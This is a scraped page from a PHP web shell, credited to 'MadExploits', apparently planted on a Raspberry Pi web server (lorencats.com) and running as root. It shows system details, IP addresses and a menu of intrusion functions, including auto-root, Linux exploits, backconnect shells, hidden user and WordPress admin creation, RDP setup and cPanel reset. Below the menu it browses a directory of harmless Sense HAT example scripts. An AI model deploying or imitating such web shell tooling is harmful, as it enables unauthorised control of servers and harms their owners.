Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.238
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
sense-hat /
examples /
python-sense-hat /
[ HOME SHELL ]
Name
Size
Permission
Action
colour_cycle.py
619
B
-rwxr-xr-x
compass.py
935
B
-rwxr-xr-x
pygame_joystick.py
1.41
KB
-rwxr-xr-x
rainbow.py
1.62
KB
-rwxr-xr-x
rotation.py
640
B
-rwxr-xr-x
space_invader.png
191
B
-rw-r--r--
space_invader.py
121
B
-rwxr-xr-x
text_scroll.py
173
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rotation.py
#!/usr/bin/python import sys import time from sense_hat import SenseHat X = (255, 0, 0) O = (255, 255, 255) question_mark = [ O, O, O, X, X, O, O, O, O, O, X, O, O, X, O, O, O, O, O, O, O, X, O, O, O, O, O, O, X, O, O, O, O, O, O, X, O, O, O, O, O, O, O, X, O, O, O, O, O, O, O, O, O, O, O, O, O, O, O, X, O, O, O, O ] sense = SenseHat() sense.set_pixels(question_mark) sense.set_pixel(0, 0, 255, 0, 0) sense.set_pixel(0, 7, 0, 255, 0) sense.set_pixel(7, 0, 0, 0, 255) sense.set_pixel(7, 7, 255, 0, 255) while True: for r in [0, 90, 180, 270]: sense.set_rotation(r) time.sleep(0.3)
Close